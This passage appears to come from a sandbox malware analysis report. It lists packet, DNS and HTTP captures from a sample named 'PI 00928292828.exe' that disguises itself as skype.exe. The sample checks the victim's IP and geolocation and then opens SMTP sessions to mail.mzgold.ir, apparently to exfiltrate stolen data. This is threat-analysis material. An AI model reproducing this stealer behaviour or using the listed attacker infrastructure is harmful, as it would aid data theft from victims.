Mar 6, 2025 07:56:20.142612934 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:20.143146038 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:20.187748909 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:20.200434923 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:20.244324923 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:20.920579910 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:20.920928001 CET	443	49734	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:20.921111107 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:20.927689075 CET	49734	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:26.067397118 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:26.072909117 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:26.226259947 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:26.265870094 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:26.510917902 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:26.516742945 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:26.517091036 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:28.054764986 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.054959059 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:28.060451031 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.322765112 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.323147058 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:28.328515053 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.597359896 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:28.602977037 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:28.603074074 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:28.603394032 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:28.605588913 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.606194019 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:28.608501911 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:28.611368895 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.896173000 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.896218061 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.896256924 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.896292925 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:28.896405935 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:28.896405935 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:28.911318064 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:28.916935921 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.179364920 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.184242010 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:29.189654112 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.196304083 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:29.201126099 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:29.206665993 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:29.366070032 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:29.370572090 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:29.370676994 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:29.370963097 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:29.378027916 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:29.378110886 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:29.406485081 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:29.452809095 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.454390049 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:29.459580898 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.722949982 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.723354101 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:29.728683949 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.998826027 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:29.999247074 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.004762888 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.267446995 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.267784119 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.273051977 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.537807941 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.538844109 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.544928074 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.808043003 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.817800999 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.818228960 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.818228960 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.818228960 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.818336010 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.818373919 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.818847895 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.818847895 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:30.823345900 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.823837996 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.823882103 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.823911905 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.823939085 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.823966026 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.824023008 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.824050903 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.824700117 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:30.824740887 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:31.292161942 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:31.344089985 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:31.349663973 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:31.349868059 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:31.352133036 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:31.352164984 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:31.352660894 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:31.420975924 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:31.468329906 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:31.942065001 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:31.942147017 CET	443	49737	104.21.112.1	192.168.2.4
Mar 6, 2025 07:56:31.942223072 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:31.945175886 CET	49737	443	192.168.2.4	104.21.112.1
Mar 6, 2025 07:56:37.089935064 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:37.095189095 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:37.269579887 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:56:37.275928974 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:37.281120062 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:37.281204939 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:37.312733889 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:56:37.991766930 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:37.992042065 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:37.997268915 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.261135101 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.261332989 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:38.266488075 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.527169943 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.527939081 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:38.533162117 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.802021027 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.802082062 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.802122116 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.802175999 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:38.893223047 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:38.895337105 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:38.900511980 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.160164118 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.166501045 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:39.171673059 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.430493116 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.431102991 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:39.436335087 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.695346117 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.695899963 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:39.701077938 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.963706017 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:39.964109898 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:39.969249964 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.228343010 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.228610039 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.233692884 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.492865086 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.493149042 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.498389959 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.756992102 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.758384943 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.758469105 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.758469105 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.758629084 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.758629084 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.758692980 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.758692980 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.758924007 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:56:40.763609886 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.763628006 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.763642073 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.763659000 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.763684988 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.764033079 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.764045954 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.764058113 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.764069080 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:40.764156103 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:41.225495100 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:56:41.266062021 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:57:16.281747103 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:57:16.287372112 CET	80	49733	158.101.44.242	192.168.2.4
Mar 6, 2025 07:57:16.287453890 CET	49733	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:57:27.284713030 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:57:27.290128946 CET	80	49736	158.101.44.242	192.168.2.4
Mar 6, 2025 07:57:27.290328979 CET	49736	80	192.168.2.4	158.101.44.242
Mar 6, 2025 07:58:06.302843094 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:58:06.308218002 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:58:06.570921898 CET	587	49735	217.144.107.148	192.168.2.4
Mar 6, 2025 07:58:06.571666956 CET	49735	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:58:17.297425032 CET	49739	587	192.168.2.4	217.144.107.148
Mar 6, 2025 07:58:17.302498102 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:58:17.562016964 CET	587	49739	217.144.107.148	192.168.2.4
Mar 6, 2025 07:58:17.562609911 CET	49739	587	192.168.2.4	217.144.107.148

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 6, 2025 07:56:14.244205952 CET	62939	53	192.168.2.4	1.1.1.1
Mar 6, 2025 07:56:14.251296043 CET	53	62939	1.1.1.1	192.168.2.4
Mar 6, 2025 07:56:18.153991938 CET	65020	53	192.168.2.4	1.1.1.1
Mar 6, 2025 07:56:18.161624908 CET	53	65020	1.1.1.1	192.168.2.4
Mar 6, 2025 07:56:26.271639109 CET	61766	53	192.168.2.4	1.1.1.1
Mar 6, 2025 07:56:26.509968996 CET	53	61766	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 6, 2025 07:56:14.244205952 CET	192.168.2.4	1.1.1.1	0xaf54	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.153991938 CET	192.168.2.4	1.1.1.1	0xb8cb	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:26.271639109 CET	192.168.2.4	1.1.1.1	0xdecb	Standard query (0)	mail.mzgold.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 6, 2025 07:56:14.251296043 CET	1.1.1.1	192.168.2.4	0xaf54	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 6, 2025 07:56:14.251296043 CET	1.1.1.1	192.168.2.4	0xaf54	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:14.251296043 CET	1.1.1.1	192.168.2.4	0xaf54	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:14.251296043 CET	1.1.1.1	192.168.2.4	0xaf54	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:14.251296043 CET	1.1.1.1	192.168.2.4	0xaf54	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:14.251296043 CET	1.1.1.1	192.168.2.4	0xaf54	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.161624908 CET	1.1.1.1	192.168.2.4	0xb8cb	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.161624908 CET	1.1.1.1	192.168.2.4	0xb8cb	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.161624908 CET	1.1.1.1	192.168.2.4	0xb8cb	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.161624908 CET	1.1.1.1	192.168.2.4	0xb8cb	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.161624908 CET	1.1.1.1	192.168.2.4	0xb8cb	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.161624908 CET	1.1.1.1	192.168.2.4	0xb8cb	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:18.161624908 CET	1.1.1.1	192.168.2.4	0xb8cb	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 6, 2025 07:56:26.509968996 CET	1.1.1.1	192.168.2.4	0xdecb	No error (0)	mail.mzgold.ir		217.144.107.148	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	158.101.44.242	80	7384	C:\Users\user\Desktop\PI 00928292828.exe

Timestamp	Bytes transferred	Direction	Data
Mar 6, 2025 07:56:14.262352943 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 6, 2025 07:56:15.842248917 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 179e9bc7f2c4e75ea3533469932c8799 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 6, 2025 07:56:15.847105980 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 6, 2025 07:56:18.152323961 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d458641488692c4f26fa0734d1b87c35 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 6, 2025 07:56:26.067397118 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 6, 2025 07:56:26.226259947 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 69803a4646c0a4a1224a7b49936dd0ba Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	158.101.44.242	80	7648	C:\Users\user\AppData\Roaming\skype.exe

Timestamp	Bytes transferred	Direction	Data
Mar 6, 2025 07:56:28.603394032 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 6, 2025 07:56:29.196304083 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b64bffe2e92262ee0edadc08da1a48be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 6, 2025 07:56:29.201126099 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 6, 2025 07:56:29.366070032 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3fb29f393e985cfbfb269dee2320c6d8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 6, 2025 07:56:37.089935064 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 6, 2025 07:56:37.269579887 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3ca6741f8bd1c32370d1a21780e9b903 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	104.21.112.1	443	7384	C:\Users\user\Desktop\PI 00928292828.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-06 06:56:20 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-06 06:56:20 UTC	845	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:56:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 cf-cache-status: MISS last-modified: Thu, 06 Mar 2025 06:56:20 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dN3rHSLP8Z%2BPckQwtVT4aXHVv7ihyzgNZNQpH0K16wz5JBxxmfqR34foN9JHMZNkrd4nnJfyT%2Fm5R8FY1bW4S7Wk6l%2FNnpiqA7BG8%2BRKN60kJV9PCsBIZQ068N2ytITzf8sjH8oc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91bff3e01a5b175e-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=46147&min_rtt=46127&rtt_var=9762&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=88581&cwnd=252&unsent_bytes=0&cid=77cb560888bc7f9b&ts=826&x=0"
2025-03-06 06:56:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.112.1	443	7648	C:\Users\user\AppData\Roaming\skype.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-06 06:56:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
